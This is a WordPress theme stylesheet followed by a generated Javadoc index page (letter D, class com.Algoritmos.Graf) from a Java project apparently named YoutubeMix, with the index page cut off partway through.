#secondary>.widget_nav_menu li.current-menu-item>a{ color:#ff5d2a; } #page .container #secondary>.widget_nav_menu>div>ul>li>ul>li>ul>li>ul{ display:none; } /*calendar widget*/ #calendar_wrap{ width:212px; border:1px solid #d9d9d9; padding:30px 33px; margin: 0 auto; } #calendar_wrap #wp-calendar{ border:0px; padding:0; margin:0; width:212px } #calendar_wrap #wp-calendar thead{ display:block; float:left; } #calendar_wrap #wp-calendar tbody{ width:210px; float:left; } table#wp-calendar td{ padding:7px 5px; border:0px; text-align:center; } table#wp-calendar th{ width:20px; display:inline-block; padding:7px 5px; border:0px; text-align:center; color:#2c9bb3; } table#wp-calendar th:last-child,table#wp-calendar th:nth-child(6){ color:#333333 } #wp-calendar caption{ border-bottom:2px solid #d6d6d6; padding:0 0 15px 0; margin:0 0 13px 0; text-transform:uppercase; font-size:18px; } #wp-calendar td{ width: 20px; height:14px; font-size:12px; line-height:14px; float:left; border:0px; color:#d6d6d6; } table#wp-calendar td.cal_has_posts{ width:18px; border:1px solid #d6d6d6; border-radius:16px; color:#d6d6d6; } #wp-calendar td#today, #wp-calendar td#today~td{ color:#8a8a8a; } table#wp-calendar td[colspan="1"]{ width:18px; } table#wp-calendar td[colspan="2"]{ width:50px; } table#wp-calendar td[colspan="3"]{ width:80px; } table#wp-calendar td[colspan="4"]{ width:110px; } table#wp-calendar td[colspan="5"]{ width:140px; } table#wp-calendar td[colspan="6"]{ width:170px; } table#wp-calendar td#prev{ width:80px; text-align:left; } table#wp-calendar td#next{ width:80px; text-align:right; } #searchform { position:relative; } #searchform:after { content: "\f002"; position: absolute; font-family: FontAwesome; right: 10px; color: #45494c; top: 6px; font-size: 15px; border-left: 1px solid #d7d7d7; padding: 0px 0 0 11px; line-height: 20px; pointer-events: none; } input#s { border-radius:2px 2px 2px 2px; font-size:13px; height:22px; line-height:1.2em; padding:4px 32px 4px 12px; width:234px; } input[type="password"] { border: 1px solid #e5e5e5; border-radius:2px 2px 2px 2px; font-size:13px; height:22px; line-height:1.2em; padding:4px 5px; width:220px; } #back-top { bottom: 24px; display: none; position: absolute; right: 2%; } #back-top a { text-decoration: none; font-size: 18px; color: #000; } .glr-container-image { float:left; width:100%; display:block; margin:30px 0; position:relative; } table { border-collapse: collapse; text-align: left; width: 100%; } table { font: normal 12px/150% Arial, Helvetica, sans-serif; background: #fff; border: 1px solid #d6d6d6; -webkit-border-radius: 2px; -moz-border-radius: 2px; border-radius: 2px; } table td, table th { padding: 7px 10px; } table thead th, table th { /*color:#333333; */ font-size: 14px; border-bottom: 1px solid #d6d6d6; } table tbody td { /*color: #7D7D7D; */ border-bottom: 1px solid #d6d6d6; font-size: 12px; font-weight: normal; } table tbody tr:last-child td:last-child { border-right:1px solid #d6d6d6; } table tfoot td div { border-top: 1px solid #8C8C8C; background: #EBEBEB; } table tfoot td { padding: 0; font-size: 12px } table tfoot td div{ padding: 2px; } table tfoot td ul { margin: 0; padding:0; list-style: none; text-align: right; } table tfoot li { display: inline; } .post-content .entry-content table tbody tr th a { color:#F15A23; text-decoration:none; } table tfoot li a { text-decoration: none; display: inline-block; padding: 2px 8px; margin: 1px; color: #F5F5F5; border: 1px solid #8C8C8C; -webkit-border-radius: 3px; -moz-border-radius: 3px; border-radius: 3px; background:-webkit-gradient( linear, left top, left bottom, color-stop(0.05, #8C8C8C), color-stop(1, #7D7D7D) ); background:-moz-linear-gradient( center top, #8C8C8C 5%, #7D7D7D 100% );filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#8C8C8C', endColorstr='#7D7D7D'); background-color:#8C8C8C; } table tfoot ul.active, table tfoot ul a:hover { text-decoration: none; border-color: #7D7D7D; color: #F5F5F5; background: none; background-color:#8C8C8C; } pre { background: #f5f5f5; color: #666; border:1px solid #d6d6d6; font-family: monospace; font-size: 14px; margin: 20px 0; overflow: auto; padding: 20px; white-space: pre; white-space: pre-wrap; word-wrap: break-word; } code, kbd, pre, samp { font-family: monospace, serif; font-size: 14px; -webkit-hyphens: none; -moz-hyphens: none; -ms-hyphens: none; hyphens: none; } blockquote, q { -webkit-hyphens: none; -moz-hyphens: none; -ms-hyphens: none; hyphens: none; quotes: none; } blockquote:before, blockquote:after, q:before, q:after { content: ""; content: none; } blockquote { font-size: 18px; font-style: italic; font-weight: 300; margin: 24px 35px; } blockquote blockquote { margin-right: 0; } blockquote cite, blockquote small { font-size: 14px; font-weight: normal; text-transform: uppercase; } blockquote em, blockquote i { font-style: normal; font-weight: 300; } blockquote strong, blockquote b { font-weight: 400; } small { font-size: smaller; } sub, sup { font-size: 75%; line-height: 0; position: relative; vertical-align: baseline; } sup { top: -0.5em; } sub { bottom: -0.25em; } code { font-size: 12px; margin-left: 3px; color: #686758; } address { font-style: italic; margin: 0 0 24px; } .head-container { position:relative; left:0; width:100%; display:block; background-repeat:no-repeat; } .head-container.fixed { position:fixed; top:0; left:0; -webkit-box-shadow: 0px 2px 2px rgba(50, 50, 50, 0.3); -moz-box-shadow: 0px 2px 2px rgba(50, 50, 50, 0.3); box-shadow: 0px 2px 2px rgba(50, 50, 50, 0.3); min-height: 0 !important; background-attachment:scroll !important; z-index: 8000; background-color:#fff; } .head-container.is_indent { top:32px; } .single-post #comments ol.commentlist li img.avatar, .page #comments ol.commentlist li img.avatar { padding: 3px; width: 32px; height: auto; background: #f7f6f7; border: 1px solid #f0eef0; line-height: 1; } #comments.comments-area h2.comments-title, #comments.comments-area #respond.comment-respond h3.comment-reply-title { margin:20px 0; font-weight:normal; } .page #comments #respond input[type="submit"]{ line-height:100%; } #comments.comments-area ol.commentlist { margin:0 0 20px 0; padding: 0; } .commentlist, .commentlist .children { list-style-type: none; padding: 0; } .comment-body { padding: 20px 0; position: relative; } .comment-form-author:before, .comment-form-author:after, .comment-form-email:before, .comment-form-email:after, .comment-form-url:before, .comment-form-url:after, .comment-body:before, .comment-body:after { content: ""; display: table; } .comment-form-author:before, .comment-form-author:after, .comment-form-email:before, .comment-form-email:after, .comment-form-url:before, .comment-form-url:after, .comment-body:before, .comment-body:after { content: ""; display: table; } .comment-body:after { clear: both; } #comments.comments-area ol.commentlist li { width: 100%; } #comments.comments-area ol.commentlist li.comment .comment-author { float:left; display:block; max-width:40px; font-size:12px; font-family:inherit; } #comments.comments-area ol.commentlist li.comment .comment-author cite.fn { display: block; float: left; width: 100%; word-wrap: break-word; text-align:center; } .comment-meta{ width:90%; } #comments .comment-meta cite.fn, #comments .comment-meta cite.fn a { color:#777777; font-style:normal; } .comment-content em{ position:relative; top:3px; } #comments.comments-area ol.commentlist li.comment .comment-author span.says { float:left; } .comment-content{ position:relative; float: right; width: calc(100% - 78px); width: -moz-calc(100% - 78px); width: -o-calc(100% - 78px); width: -webkit-calc(100% - 78px); word-wrap: break-word; border: 1px solid #F0EEF0; border-radius: 4px; -webkit-border-radius: 4px; -moz-border-radius: 4px; padding: 14px; } #comments.comments-area ol.commentlist li.comment .comment-meta a.meta-date { color: #A2A2A2; font-size: 13px; text-decoration:none; } #comments.comments-area ol.commentlist li.comment .comment-meta a.comment-edit-link { font-size: 13px; text-decoration:none; } .commentlist .reply { position:absolute; top:14px; right:14px; } #comments.comments-area ol.commentlist li.comment .reply a.comment-reply-link { text-decoration:none; } .comment-respond { width:100%; display:block; margin:20px 0; } .comment-form-comment{ margin-bottom:25px; } #comments.comments-area #respond.comment-respond form#commentform.comment-form p.comment-form-comment label { margin:0 0 5px 0; float:left; display:block; width:100%; } .commentsErrorBox { color: #F15A23; line-height: 1em; margin-bottom: 27px; padding: 14px 26px 14px 46px; overflow:hidden; -webkit-border-radius: 10px; -moz-border-radius: 10px; border-radius: 10px; border: 1px solid #FF5C2C; background:url(images/error.png) no-repeat 12px center transparent; display:inline-block; width:88%; } .commentsErrorBox ul { margin:0; padding:0; list-style:none; list-style:none; margin:5px 0; padding:0; } .gallery { display:block; float:left; display:block; width:100%; } .blog_post .gallery { padding:0 0 20px; } .gallery .gallery-item { float:left; display:block; margin: 0 4px 4px 0; position:relative; overflow:hidden; } .gallery-caption { background-color: rgba(0, 0, 0, 0.7); bottom: 0; color: #FFFFFF; font-size: 14px; left: 0; line-height: 1.3; margin: 0; max-height: 50%; opacity: 0; padding: 2px 8px; position: absolute; text-align: left; -webkit-transition: opacity 400ms ease; transition: opacity 400ms ease; width: 100%; font-style: italic; font-weight: 300; } .gallery-caption:before { box-shadow: 0 -10px 15px #000000 inset; content: ""; height: 100%; left: 0; min-height: 49px; position: absolute; top: 0; width: 100%; } .gallery .gallery-item .gallery-icon a { float:left; } .gallery .gallery-item .gallery-icon a img.attachment-thumbnail { display: block; float: left; max-width: 100%; width: 100%; } .gallery-item:hover .gallery-caption { opacity: 1; } .gallery-columns-1 .gallery-item, .gallery-columns-2 .gallery-item, .gallery-columns-3 .gallery-item { text-align: center; } .gallery.gallery-columns-1 .gallery-item:nth-of-type(1n), .gallery.gallery-columns-2 .gallery-item:nth-of-type(2n), .gallery.gallery-columns-3 .gallery-item:nth-of-type(3n), .gallery.gallery-columns-4 .gallery-item:nth-of-type(4n), .gallery.gallery-columns-5 .gallery-item:nth-of-type(5n), .gallery.gallery-columns-6 .gallery-item:nth-of-type(6n), .gallery.gallery-columns-7 .gallery-item:nth-of-type(7n), .gallery.gallery-columns-8 .gallery-item:nth-of-type(8n), .gallery.gallery-columns-9 .gallery-item:nth-of-type(9n) { margin: 0 0 4px 0; } .page-links { clear: both; font-size: 16px; font-style: italic; font-weight: normal; line-height: 2.2; margin: 20px 0; text-transform: uppercase; } body.page .entry-thumbnail { display: block; float: left; height: auto; margin: 0 0 20px; width: 100%; box-sizing: border-box; -moz-box-sizing: border-box; -webkit-box-sizing: border-box; padding: 0 4.4%; } body.page .entry-thumbnail .wp-post-image { box-shadow: none; -webkit-box-shadow: none; -moz-box-shadow: none; height: auto; width: 100%; } aside #lang_sel { z-index: 5; } /*Custom Tabs*/ /* .custom-tabs { float:left; display:block; width:100%; max-width:100%; height:100%; margin:0 0 60px 0; } .custom-tabs ul { float: left; margin: 0; width: 100%; list-style:none; max-width: 240px; } .custom-tabs ul li { float: left; margin: 0; width: 228px; min-height: 25px; border-bottom: 1px solid #e5e5e5; border-right: 1px solid #e5e5e5; padding: 0 0 0 10px; background-image: url("images/menu_shadow.png"); background-repeat: no-repeat; background-position: right 0; border-left: 1px solid #FFFFFF; border-left: 1px solid #FFFFFF; } .custom-tabs ul li a { float: left; font-weight: bold; line-height: 25px; min-width: 10em; padding: 14px 5px; width: 150px; text-decoration:none; color:#818181; } .custom-tabs ul li.current { background-color: #fefefe; border-left:1px solid #e5e5e5; border-right:0; -webkit-border-top-left-radius: 4px; -webkit-border-bottom-left-radius: 4px; -moz-border-radius-topleft: 4px; -moz-border-radius-bottomleft: 4px; border-top-left-radius: 4px; border-bottom-left-radius: 4px; background-image:none; } .custom-tabs ul li:first-child { border-top:1px solid #e5e5e5; } .custom-tabs ul li.current a { border-bottom-color: #6D6D6D; border-top-color: #808080; color:#3e3e3e; outline: 0; } .custom-tabs ul li:hover { color:#e1704b } .custom-tabs .tab-content { background: none repeat scroll 0 0 #FFFFFF; display: none; float: right; max-width: 640px; min-height: 600px; padding: 0 15px; width: 100%; } */ @media only screen and (min-width:959px) { .single-post .sixteen.columns.alpha.omega .blog_post .post-content {width:94%} } /* All Mobile Sizes (devices and browser) */ @media only screen and (min-width:768px) { .search header.post-header .post-title {width:94.01%; padding: 0 3% 13px ;} .blog_post .post-content .entry-summary{padding:20px 3% 10px;margin-top:0} .search .blog_post .post-content footer.entry-meta{padding:0 3%} .search article.post-password-required header.post-header .post-title{width:90.51%;padding: 0 6.5% 13px 3%;} .search article.format-link header.post-header .post-title{width:90.51%;padding: 0 6.5% 13px 3%;} .search article[class*=tag-twitter] header.post-header .post-title{width:90.51%;padding: 0 6.5% 13px 3%;} .search article.format-quote header.post-header .post-title{width:90.51%;padding: 0 6.5% 13px 3%;} /*single post*/ .single-post .eleven.columns.omega{float:right} .single-post .five.columns.alpha{float:left} /*styles for responsive full header*/ .resp_full_width_menu>.container{display:block;} .resp_full_width_menu>.site-header{display:none;} } @media only screen and (min-width:768px) and (max-width:959px) { .blog_post .post-content {width: 692px;} .eleven.columns .blog_post .post-content {width: 452px;} .search .blog_post .post-content {width:692px;} #calendar_wrap{padding:10px 3px} input#s { width:174px;} /*single post*/ .single-post .sixteen.columns.alpha.omega .blog_post .post-content {width:92%} } @media screen and ( max-width: 782px ) { .head-container.is_indent {top: 46px;} } @media screen and (max-width: 600px) { .head-container.is_indent {top: 0;} } @media only screen and (max-width:767px) { .page-container{margin-bottom:40px;} /* nav menu ul & select */ .menu { display:none; } #header_language_select{display:none;} .widget_nav_menu .menu {display:block;} .main-navigation { float:none !important; } #page-header .head-container .container header .header-hgroup { margin: 0 0 15px; } .select-menu { display:block; } #back-top { display: none; } .blog_post .post-content, .eleven.columns .blog_post .post-content, .search .blog_post .post-content {width: 338px;} input#s { width:348px; } body.post-type-archive #searchform input#s{max-width:100%} .comment-meta{ width:80%;} #page .container #secondary .widget>ul>li.cat-item{overflow-x:hidden} .flex-control-nav{display:none} .page-header{width: 94%;padding: 10px 3%;margin:0} #comments {width: 94%;padding: 10px 3%;margin:0} article {width: 94%;padding: 10px 3%;margin:0} #colophon {width: 94%;padding: 10px 3%;margin:0} .blog_post {width:auto} #page .container #secondary {width: 94%;padding: 10px 3%;margin:40px 0 0 0} #colophon .site-info{width:100%} body .resp-tab-content{border: 1px solid #c1c1c1;} body .resp-tabs-container{width: 96% !important;margin: 0 2%;} /*styles for responsive full header*/ .resp_full_width_menu>.container{display:none;} .resp_full_width_menu>.site-header{display:block;} .resp_full_width_menu.head-container{float:left;} .resp_full_width_menu #header_language_select{display:block;} .resp_full_width_menu #header_language_select .current, .resp_full_width_menu #header_language_select .current a, .resp_full_width_menu #header_language_select .current ul#lang-select-popup{transition:none;-webkit-transition:none; -moz-transition:none; -khtml-transition: none; -o-transition: none; -ms-transition: none; transition: none;} .resp_full_width_menu #header_language_select ul li:hover > ul{visibility:hidden;} .resp_full_width_menu #lang-select-block a{padding:7px} .resp_full_width_menu .site-header{ width:100%; float:left; } .resp_full_width_menu .site-header .logo_wrapper{ display:block; float:left; width:48%; margin:10px 0 0 2%; } .resp_full_width_menu .site-header .cart_wrapper, .resp_full_width_menu .site-header .menu_button{ display:block; float:right; margin-left:12px; margin-right:12px; } .resp_full_width_menu .site-header .language_switcher{ display:block; float:right;} .resp_full_width_menu .site-header .select-menu{ display:none; } .resp_full_width_menu .site-header .menu_button button{ background:none !important; float:left; margin: 15px 10px 9px; padding: 0; z-index: 9; background: none; border: 0; height: 30px; width: 35px; outline:none; } .resp_full_width_menu .site-header .menu_button button span{ display: block; margin: 0 auto; margin-bottom: 5px; background: #333333; height: 5px; width: 35px; border-radius: 3px; } .resp_full_width_menu .menu_wrapper{ float:left; width:100%; overflow-y:auto; } .resp_full_width_menu .menu_wrapper.collapse{ display:none; } .resp_full_width_menu .menu_wrapper>div{ width:100%; float:left; } .resp_full_width_menu ul{ list-style:none; } .resp_full_width_menu .menu{ display:block; width:100%; float:left; margin:0; padding:0; } .resp_full_width_menu .menu ul{ margin:0; } .resp_full_width_menu .menu li a{ width:97%; padding:17px 1% 17px 2%; float:left; text-decoration:none; height:21px; } .resp_full_width_menu .menu li a:hover{ padding-top:17px;padding-bottom:17px; float:left; text-decoration:none; height:21px; } .resp_full_width_menu .menu>li>ul>li>a{ width:93%; padding-left:6%; } .resp_full_width_menu .menu>li>ul>li>ul>li>a{ width:87%; padding-left:12%; } .resp_full_width_menu .menu ul ul ul{ display:none; } .resp_full_width_menu .site-header .menu_wrapper .menu li a{ -webkit-transition: all 0.2s ease-in-out; -moz-transition: all 0.2s ease-in-out; -khtml-transition: all 0.2s ease-in-out; -o-transition: all 0.2s ease-in-out; -ms-transition: all 0.2s ease-in-out; transition: all 0.2s ease-in-out; } .resp_full_width_menu .cart-button{ clear:none; margin: 21px 10px 14px; } } @media only screen and (min-width:480px) and (max-width:767px) { .mejs-controls div.mejs-time-rail{width:149px !important} .responsive .select-menu{margin: 16px 0 25px 0 !important} } @media only screen and (max-width:479px) { #masthead .social-icon{float: left;clear: both;margin:20px 0;} .blog_post .date_of_post {width: 50px; height: 50px; float:none; left:0; top:1px} .blog_post .date_of_post .day_post {font-size: 18px;} .blog_post .post-content, .eleven.columns .blog_post .post-content, .search .blog_post .post-content{width: 281px;} input#s {width:236px;} #page .container #secondary .widget>ul>li.cat-item{overflow-x:hidden} .responsive .select-menu{margin: 16px 0 25px 0 !important} /*styles for responsive full header*/ .resp_full_width_menu .site-header .cart_wrapper, .resp_full_width_menu .site-header .menu_button{ margin-left:2px; margin-right:2px; } } @media only screen and (max-device-width:1024px) and (orientation:portrait) {} @media only screen and (max-device-width:1024px) and (orientation:landscape) {} /*RTL Styles*/ html[dir="rtl"] #colophon .site-info { float:right;} html[dir="rtl"] #masthead .social-icon{ float:left;} html[dir="rtl"] #colophon .social-icon{ float:left;} html[dir="rtl"] .site-content .nav-previous a{float:right;} html[dir="rtl"] .site-content .nav-previous a .meta-nav{float:left;} html[dir="rtl"] .site-content .nav-next{text-align:left;margin-left:8%;float:left} html[dir="rtl"] .site-content .nav-next a{float:left;direction:ltr} html[dir="rtl"] .site-content .nav-next a .meta-nav{float:none;} html[dir="rtl"] .blog_post .date_of_post {float:right;right:1px;left:initial} html[dir="rtl"] .blog_post .post-content footer.entry-meta .edit-link{float:left;} html[dir="rtl"] .blog_post .post-content footer.entry-meta .comments-link {padding:0 26px 2px 0; margin:0 0 0 10px;background:url(images/comment.png) no-repeat right 0 transparent;} html[dir="rtl"] .blog_post .post-content footer.entry-meta .author-link {padding:0 26px 2px 0; margin:0 0 0 10px;background:url(images/user.png) no-repeat right 0 transparent;} html[dir="rtl"] .blog_post .post-content footer.entry-meta .cat-links {padding:0 26px 2px 0; margin:0 0 0 10px;background:url(images/category.png) no-repeat right 3px transparent;} html[dir="rtl"] .blog_post .post-content footer.entry-meta .tag-links {padding:0 26px 2px 0; margin:0 0 0 10px;background:url(images/tag.png) no-repeat right 3px transparent;} html[dir="rtl"] .screen-reader-text {padding:8px 0 8px 15px} html[dir="rtl"] article.post-password-required header.post-header .post-title {padding: 0 4.4% 13px 10%;background:url(images/post-password.png) no-repeat 3% 0 transparent;} html[dir="rtl"] article.format-link header.post-header .post-title {padding: 0 4.4% 13px 10%;background:url(images/post-link.png) no-repeat 3% 0 transparent;} html[dir="rtl"] article[class*=tag-twitter] header.post-header .post-title {padding: 0 4.4% 13px 10%;background:url(images/post-twitter.png) no-repeat 3% 0 transparent;} html[dir="rtl"] article.format-quote header.post-header .post-title {padding: 0 4.4% 13px 10%;background:url(images/post-quote.png) no-repeat 3% 0 transparent;} html[dir="rtl"] article.format-image .wp-caption a:after{left:initial;right:0;} html[dir="rtl"] #page .container #secondary .widget ul {float:right;margin:0 8px 0 0;} html[dir="rtl"] #page .container #secondary>.widget_nav_menu a{float:right;} html[dir="rtl"] #page .container #secondary .widget ul.children{padding-right:20px;padding-left:0} html[dir="rtl"] #page .container #secondary>.widget_nav_menu>div>ul>li ul>li>a{padding-left:0;padding-right:5px;} html[dir="rtl"] #page .container #secondary>.widget_nav_menu>div>ul li>ul{margin-left:0;margin-right:20px;float:right;} html[dir="rtl"] #page .container #secondary>.widget_nav_menu>div>ul>li ul>li>a:before{display:none;} html[dir="rtl"] #page .container #secondary>.widget_nav_menu>div>ul>li ul>li>a:after{content: "\f104";color: #333333;font-family: FontAwesome;margin-left: 6px;font-size: 1em;font-weight: bold;} html[dir="rtl"] #page .container #secondary>.widget_nav_menu>div>ul>li ul>li>a:hover:after{color: #ff5d2a;} html[dir="rtl"] #page .container #secondary>.widget_nav_menu li, html[dir="rtl"] #page .container #secondary>.widget_nav_menu li ul li{float:right} html[dir="rtl"] #page .container #secondary .widget ul li.cat-item a{padding: 0 5px 0 0;float: right;} html[dir="rtl"] #page .container #secondary .widget ul li.cat-item a:before{display:none;} html[dir="rtl"] #page .container #secondary .widget ul li.cat-item a:after{content: "\f104";color: #333333;font-family: FontAwesome;margin-left: 6px;font-size: 1em;font-weight: bold;} html[dir="rtl"] #page .container #secondary .widget ul li.current-cat>a, html[dir="rtl"] #page .container #secondary .widget ul li.current-cat>a:after, html[dir="rtl"] #page .container #secondary .widget ul li.cat-item a:hover, html[dir="rtl"] #page .container #secondary .widget ul li.cat-item a:hover:after {color: #ff5d2a;} html[dir="rtl"] #page .container #secondary .widget ul li.cat-item{float: right;width: 95%;} html[dir="rtl"] input#s { background:url("images/search_icon_rtl.png") no-repeat scroll 3% 5px transparent;padding:4px 5px 4px 32px;float:right} html[dir="rtl"] #comments.comments-area ol.commentlist li.comment .comment-author {float:right} html[dir="rtl"] #comments.comments-area ol.commentlist li.comment .comment-author cite.fn {float:right} html[dir="rtl"] #comments.comments-area ol.commentlist li.comment .comment-author span.says {float:right} html[dir="rtl"] .comment-content{float:left} html[dir="rtl"] .commentlist .reply {right:initial;left:14px;} html[dir="rtl"] #comments.comments-area #respond.comment-respond form#commentform.comment-form p.comment-form-comment label {float:right} html[dir="rtl"] .commentsErrorBox {padding:14px 46px 14px 26px;} html[dir="rtl"] .gallery .gallery-item {margin:0 0 4px 4px} html[dir="rtl"] .gallery-caption {left:initial;right:0; text-align: right;} html[dir="rtl"] .gallery-caption:before {left:initial;right:0;} html[dir="rtl"] .gallery .gallery-item .gallery-icon a {float:right} html[dir="rtl"] .gallery .gallery-item .gallery-icon a img.attachment-thumbnail {float:right} html[dir="rtl"] .entry-thumbnail {float:right} html[dir="rtl"] body.page .entry-thumbnail {float:right} @media only screen and (min-width:768px) { html[dir="rtl"] .search article.post-password-required header.post-header .post-title {padding: 0 3% 13px 6.5%;} html[dir="rtl"] .search article.format-link header.post-header .post-title {padding: 0 3% 13px 6.5%;} html[dir="rtl"] .search article[class*=tag-twitter] header.post-header .post-title {padding: 0 3% 13px 6.5%;} html[dir="rtl"] .search article.format-quote header.post-header .post-title {padding: 0 3% 13px 6.5%;} } @media only screen and (max-width:479px) { html[dir="rtl"] #masthead .social-icon{float: right;} html[dir="rtl"] .blog_post .date_of_post {right:0px;} } /*end of RTL styles*/ /*STYLES FOR SOME PLUGINS*/ /* Styles for plugin "Fruitful Shortcodes" */ /*buttons*/ body .btn{padding:10px 18px;margin-bottom:0;font-size:14px;line-height:20px;text-shadow:none;background-image:none;filter:none;border-width:0;-webkit-border-radius:0px;-moz-border-radius:0px;border-radius:0px;-webkit-box-shadow:none;-moz-box-shadow:none;box-shadow:none;transition: all 0.3s ease-in-out;}.btn:hover,.btn:focus,.btn:active,.btn.active,.btn.disabled,.btn[disabled]{color:#333333;background-color:#e6e6e6;*background-color:#d9d9d9;} body .btn.btn-mini{padding:6px 12px} body .btn.btn-small{padding:8px 15px} body .btn.btn-large{padding:12px 21px} .btn{background-color:#ff5d2a !important} .btn:hover{background-color:#fe4502 !important} .btn.btn-primary{background-color:#006dcc !important} .btn.btn-primary:hover{background-color:#0044cc !important} .btn.btn-info{background-color:#49afcd !important} .btn.btn-info:hover{background-color:#2f96b4 !important} .btn.btn-success{background-color:#5bb75b !important} .btn.btn-success:hover{background-color:#51a351 !important} .btn.btn-warning{background-color:#faa732 !important} .btn.btn-warning:hover{background-color:#f89406 !important} .btn.btn-danger{background-color:#da4f49 !important} .btn.btn-danger:hover{background-color:#bd362f !important} .btn.btn-inverse{background-color:#363636 !important} .btn.btn-inverse:hover{background-color:#222222 !important} .ffs-info-box a {text-decoration:none} .fruitful_description a {text-decoration:none} /*horizontal tabs*/ body .ffs-tabbed-nav .resp-tabs-list li{ position: relative; z-index: 1; background: none; cursor: pointer; float: none; margin: 0; padding: 15px 20px !important; width: auto; border:0; color: #111111; font-size: 13px; font-weight: normal; line-height: 18px; outline: 0 none; } body .ffs-tabbed-nav .resp-tabs-list li.resp-tab-active,body .ffs-tabbed-nav .resp-tabs-list li:hover{ background: none repeat scroll 0 0 #EEEEEE; border-bottom: 3px solid #333333; margin-bottom:0 !important; } body .ffs-tabbed-nav ul.resp-tabs-list{border-bottom: 1px solid rgba(0, 0, 0, 0.15);} body .resp-tab-content{border:0} /*vartical tabs*/ body .ffs-tabbed-nav .resp-vtabs li.resp-tab-item{ position: relative; z-index: 1; background: none; cursor: pointer; float: none; margin: 0; padding: 15px 0 15px 20px !important; width: auto; border:0; color: #111111; display: block; font-size: 13px; font-weight: normal; line-height: 18px; outline: 0 none; } body .ffs-tabbed-nav.resp-vtabs li.resp-tab-active,body .resp-vtabs li.resp-tab-item:hover{margin:0; background: none repeat scroll 0 0 #EEEEEE; border:0;border-right: 3px solid #333333; margin-right:-3px !important; } body .ffs-tabbed-nav.resp-vtabs ul.resp-tabs-list{margin:0;border:0;border-right: 1px solid rgba(0, 0, 0, 0.15);} body .resp-vtabs .resp-tabs-container{border:0} /* end of styles for plugin "Fruitful Shortcodes" */ /* Styles for plugin "BuddyPress" */ #buddypress input[type=submit]{ background:#f15a23; border:none; font-family:"Open Sans"; color: #fff; text-transform:uppercase; cursor:pointer; font-size:1.4rem; font-size:14px; padding: 10px 18px ; -webkit-appearance: none; -webkit-transition: background 0.2s ease-in-out; -moz-transition: background 0.2s ease-in-out; -khtml-transition: background 0.2s ease-in-out; -o-transition: background 0.2s ease-in-out; -ms-transition: background 0.2s ease-in-out; transition: background 0.2s ease-in-out; line-height:100%; } #buddypress input[type=submit]:hover, #buddypress input[type=submit]:active{ border:0; color:white; } #buddypress #whats-new-options{ height:auto !important; } #buddypress form#whats-new-form textarea{ width:calc(100% - 14px); min-height:40px; } /* end of styles for plugin "BuddyPress" */ /* Styles for plugin "SEO Facebook Comments" */ div#fbSEOComments{ float:left; width:100%; } /* end styles for plugin "SEO Facebook Comments" */ @media only screen and (-webkit-min-device-pixel-ratio: 2), only screen and ( min--moz-device-pixel-ratio: 2), only screen and ( -o-min-device-pixel-ratio: 2/1), only screen and ( min-device-pixel-ratio: 2), only screen and ( min-resolution: 192dpi), only screen and ( min-resolution: 2dppx) { #page-header .container header .header-hgroup a.link-logo {display: none;} #page-header .container header .header-hgroup a.link-logo-retina {display:block; width:100%; margin:0 auto} #page-header .container header .center-pos a.link-logo-retina {width:50%} } @media (-webkit-min-device-pixel-ratio: 3), (min-resolution: 288dpi) { #page-header .container header .header-hgroup a.link-logo {display: none;} #page-header .container header .header-hgroup a.link-logo-retina {display:block; width:100%; margin:0 auto} #page-header .container header .center-pos a.link-logo-retina {width:50%} }
Javadoc/JavaDoc/index-files/index-4.html
richardeus1/YoutubeMix
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- NewPage --> <html lang="es"> <head> <!-- Generated by javadoc (version 1.7.0_79) on Wed Jun 03 09:31:49 CEST 2015 --> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>D-Index</title> <meta name="date" content="2015-06-03"> <link rel="stylesheet" type="text/css" href="../stylesheet.css" title="Style"> </head> <body> <script type="text/javascript"><!-- if (location.href.indexOf('is-external=true') == -1) { parent.document.title="D-Index"; } //--> </script> <noscript> <div>JavaScript is disabled on your browser.</div> </noscript> <!-- ========= START OF TOP NAVBAR ======= --> <div class="topNav"><a name="navbar_top"> <!-- --> </a><a href="#skip-navbar_top" title="Skip navigation links"></a><a name="navbar_top_firstrow"> <!-- --> </a> <ul class="navList" title="Navigation"> <li><a href="../overview-summary.html">Overview</a></li> <li>Package</li> <li>Class</li> <li>Use</li> <li><a href="../overview-tree.html">Tree</a></li> <li><a href="../deprecated-list.html">Deprecated</a></li> <li class="navBarCell1Rev">Index</li> <li><a href="../help-doc.html">Help</a></li> </ul> </div> <div class="subNav"> <ul class="navList"> <li><a href="index-3.html">Prev Letter</a></li> <li><a href="index-5.html">Next Letter</a></li> </ul> <ul class="navList"> <li><a href="../index.html?index-filesindex-4.html" target="_top">Frames</a></li> <li><a href="index-4.html" target="_top">No Frames</a></li> </ul> <ul class="navList" id="allclasses_navbar_top"> <li><a href="../allclasses-noframe.html">All Classes</a></li> </ul> <div> <script type="text/javascript"><!-- allClassesLink = document.getElementById("allclasses_navbar_top"); if(window==top) { allClassesLink.style.display = "block"; } else { allClassesLink.style.display = "none"; } //--> </script> </div> <a name="skip-navbar_top"> <!-- --> </a></div> <!-- ========= END OF TOP NAVBAR ========= --> <div class="contentContainer"><a href="index-1.html">A</a>&nbsp;<a href="index-2.html">B</a>&nbsp;<a href="index-3.html">C</a>&nbsp;<a href="index-4.html">D</a>&nbsp;<a href="index-5.html">E</a>&nbsp;<a href="index-6.html">F</a>&nbsp;<a href="index-7.html">G</a>&nbsp;<a href="index-8.html">H</a>&nbsp;<a href="index-9.html">I</a>&nbsp;<a href="index-10.html">L</a>&nbsp;<a href="index-11.html">M</a>&nbsp;<a href="index-12.html">N</a>&nbsp;<a href="index-13.html">O</a>&nbsp;<a href="index-14.html">P</a>&nbsp;<a href="index-15.html">R</a>&nbsp;<a href="index-16.html">S</a>&nbsp;<a href="index-17.html">T</a>&nbsp;<a href="index-18.html">U</a>&nbsp;<a name="_D_"> <!-- --> </a> <h2 class="title">D</h2> <dl> <dt><span class="strong"><a href="../com/Algoritmos/Graf.html#Diccionari">Diccionari</a></span> - Variable in class com.Algoritmos.<a href="../com/Algoritmos/Graf.html" title="class in com.Algoritmos">Graf</a></dt> <dd>&nbsp;</dd> <dt><span class="strong"><a href="../com/Algoritmos/Graf.html#DiccionariInvers">DiccionariInvers</a></span> - Variable in class com.Algoritmos.<a href="../com/Algoritmos/Graf.html" title="class in com.Algoritmos">Graf</a></dt> <dd>&nbsp;</dd> </dl> <a href="index-1.html">A</a>&nbsp;<a 